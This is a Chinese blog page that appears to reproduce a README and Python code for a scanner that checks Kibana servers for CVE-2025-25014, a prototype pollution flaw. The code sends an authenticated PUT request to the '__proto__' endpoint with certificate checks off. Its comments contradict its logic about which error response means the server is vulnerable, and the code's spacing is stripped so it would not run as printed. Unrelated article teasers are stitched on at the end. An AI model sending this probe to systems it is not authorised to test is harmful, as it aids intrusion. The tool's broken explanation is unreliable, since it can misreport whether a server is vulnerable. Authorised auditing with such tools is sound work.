news 2026/7/12 6:56:19

Kibana原型污染漏洞检测工具

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Kibana原型污染漏洞检测工具

Kibana原型污染漏洞检测工具

项目标题与描述

CVE-2025-25014 Kibana漏洞检测器

这是一个专门用于检测CVE-2025-25014漏洞的Python工具。该漏洞是Kibana中的一个严重原型污染漏洞,可导致远程代码执行(RCE),影响Kibana 8.3.0至8.17.5版本,以及8.18.0和9.0.0版本。本工具通过向Kibana的特定API端点发送精心构造的HTTP请求,验证目标系统是否存在该安全漏洞。

功能特性

  • 漏洞检测:通过向Kibana的__proto__端点发送PUT请求检测原型污染漏洞
  • 身份认证支持:支持使用Basic认证进行身份验证
  • 代理支持:可通过代理服务器进行漏洞检测
  • 详细输出:提供彩色终端输出,清晰显示检测结果
  • 错误处理:包含完整的异常处理和SSL证书验证跳过功能
  • 灵活配置:支持通过命令行参数灵活配置目标URL、认证信息和代理设置

安装指南

系统要求

  • Python 3.6+
  • requests库
  • 网络访问权限(能够访问目标Kibana实例)

安装步骤

  1. 安装Python依赖

    pipinstallrequests
  2. 下载检测脚本

    gitclone<项目仓库地址>cdkibana-cve-2025-25014-detector
  3. 设置执行权限(Linux/macOS):

    chmod+x CVE-2025-25014.py

依赖项

  • requests:用于发送HTTP请求
  • urllib3:用于处理URL和HTTP连接
  • argparse:用于解析命令行参数

使用说明

基础使用

最基本的检测命令格式:

python3 CVE-2025-25014.py https://target-kibana-server:5601-uusername-ppassword

参数详解

参数简写说明必选
url-目标Kibana服务器的URL
-u, --user-uKibana认证用户名
-p, --password-pKibana认证密码
--proxy-代理服务器URL

使用示例

示例1:基础检测

python3 CVE-2025-25014.py https://192.168.1.100:5601-uadmin-ppassword123

示例2:通过代理检测

python3 CVE-2025-25014.py https://kibana.company.com-uelastic-psecurepass--proxyhttp://proxy-server:8080

输出说明

  • 目标存在漏洞:显示红色文字"Target is vulnerable"
  • 目标不存在漏洞:显示"Target is not vulnerable"

典型使用场景

  1. 安全审计:在安全审计过程中快速扫描Kibana实例
  2. 漏洞验证:验证已修复的系统是否真正安全
  3. 渗透测试:在授权测试中验证漏洞存在性
  4. 安全监控:定期检查生产环境中的Kibana实例

漏洞背景信息

CVE-2025-25014是一个严重的原型污染漏洞,影响Kibana的Machine Learning和Reporting功能:

  • CVSS评分:9.1/10(严重)
  • 影响范围:Kibana 8.3.0至8.17.5,以及8.18.0和9.0.0
  • 利用条件:需要高权限认证且Machine Learning或Reporting功能已启用
  • 修复版本:8.17.6、8.18.1、9.0.1或更新版本

核心代码

主检测函数

defcheck(url:str,auth:str,proxies:dict|None=None)->bool:""" 检测目标Kibana实例是否存在CVE-2025-25014漏洞 参数: url: 目标Kibana的URL auth: Basic认证字符串(base64编码) proxies: 代理服务器配置字典 返回: bool: True表示存在漏洞,False表示不存在漏洞 """# 构造目标URL,指向__proto__端点url=urljoin(url,"__proto__")# 设置请求头,包含认证信息和内容类型headers={"Authorization":f"Basic{auth}",# Basic认证"Content-Type":"application/json",# JSON格式请求体"Connection":"close"# 请求后关闭连接}# 构造请求数据,模拟正常的索引映射创建请求data={"mappings":{"properties":{"timestamp":{"type":"date"},"test_field":{"type":"keyword"},"by_field":{"type":"keyword"},"value":{"type":"float"}}}}# 发送PUT请求到目标端点response=requests.put(url,headers=headers,json=data,verify=False,# 跳过SSL证书验证proxies=proxies)# 检查响应状态码,正常情况应该返回400错误ifresponse.status_code!=400:returnFalse# 检查响应内容是否包含特定错误信息# 如果包含'Invalid index name [__proto__]'说明系统正确处理了恶意请求if'"reason":"Invalid index name [__proto__]'notinresponse.text:returnFalse# 只有同时满足上述两个条件才判断为不存在漏洞returnTrue

命令行参数解析

if__name__=="__main__":""" 主程序入口点,处理命令行参数并执行漏洞检测 """# 创建参数解析器,设置工具描述parser=argparse.ArgumentParser(description='Check Kibana vulnerability')# 定义必需参数parser.add_argument('url',help='Target Kibana URL (https://ip:port)')parser.add_argument('-u','--user',required=True,help='Username for authentication')parser.add_argument('-p','--password',required=True,help='Password for authentication')parser.add_argument('--proxy',help='Proxy URL (optional)')# 可选代理参数# 解析命令行参数args=parser.parse_args()# 将用户名和密码编码为Basic认证格式basic_auth=b64encode(f"{args.user}:{args.password}".encode()).decode()# 配置代理设置(如果提供了代理参数)proxies_dict=Noneifargs.proxy:proxies_dict={'http':args.proxy,'https':args.proxy}# 执行漏洞检测并输出结果ifcheck(args.url,basic_auth,proxies=proxies_dict):# 使用红色文字输出漏洞存在警告print("\033[91mTarget is vulnerable\033[0m")else:# 正常输出无漏洞信息print("Target is not vulnerable")

初始化代码

importargparsefromurllib.parseimporturljoinfrombase64importb64encodeimportrequestsimporturllib3# 禁用SSL警告,避免证书验证干扰输出urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

安全说明:本工具仅用于授权的安全测试和教育目的。禁止未经授权对任何系统进行测试。使用前请确保已获得目标系统的测试授权。
6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAPELBDEtksiPi2p7hvmwL/d
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/29 21:38:02

小白到大神必学:大模型核心技术RAG、Agent、MCP全解析!

简介 本文详解大模型三大核心技术&#xff1a;RAG(检索增强生成)提供事实基础&#xff0c;Agent(智能体)实现自主决策&#xff0c;MCP(模型上下文协议)构建标准交互接口。三者协同工作&#xff0c;RAG为Agent提供知识支持&#xff0c;MCP作为桥梁连接外部系统&#xff0c;共同…

作者头像 李华
网站建设 2026/6/9 19:21:46

Flowframes视频插帧工具:从零开始完整安装配置指南

Flowframes视频插帧工具&#xff1a;从零开始完整安装配置指南 【免费下载链接】flowframes Flowframes Windows GUI for video interpolation using DAIN (NCNN) or RIFE (CUDA/NCNN) 项目地址: https://gitcode.com/gh_mirrors/fl/flowframes 想要将普通视频变成流畅丝…

作者头像 李华
网站建设 2026/7/4 22:37:36

电力系统仿真终极指南:快速掌握MATPOWER核心技术

电力系统仿真终极指南&#xff1a;快速掌握MATPOWER核心技术 【免费下载链接】matpower MATPOWER – steady state power flow simulation and optimization for MATLAB and Octave 项目地址: https://gitcode.com/gh_mirrors/ma/matpower 电力系统仿真在现代能源研究中…

作者头像 李华
网站建设 2026/7/1 9:13:37

【Dify 1.11.1兼容性避坑指南】:资深架构师亲授4种平滑升级方案

第一章&#xff1a;Dify 1.11.1 兼容性测试在部署 Dify 1.11.1 版本时&#xff0c;确保其与现有技术栈的兼容性是保障系统稳定运行的关键步骤。本测试覆盖主流操作系统、数据库版本及依赖服务&#xff0c;验证其在不同环境下的功能完整性与性能表现。测试环境配置 本次测试基于…

作者头像 李华
网站建设 2026/7/9 14:29:21

掌握pytest的高级技巧,提升测试效率与质量

在软件开发的过程中&#xff0c;测试是一个不可或缺的环节。而pytest作为一个功能强大的Python测试框架&#xff0c;不仅可以简化测试的编写和执行&#xff0c;还提供了许多高级功能和技巧&#xff0c;帮助开发人员提高测试效率和质量。本文将介绍pytest的高级使用技巧&#xf…

作者头像 李华
网站建设 2026/7/10 14:18:08

【Dify高性能计算指南】:如何将多模态处理速度提升至行业顶尖水平

第一章&#xff1a;Dify多模态处理速度的核心价值在人工智能应用日益复杂的背景下&#xff0c;多模态数据的实时处理能力成为系统性能的关键指标。Dify 通过优化底层计算架构与推理调度机制&#xff0c;显著提升了文本、图像、音频等多种模态数据的并行处理速度&#xff0c;为开…

作者头像 李华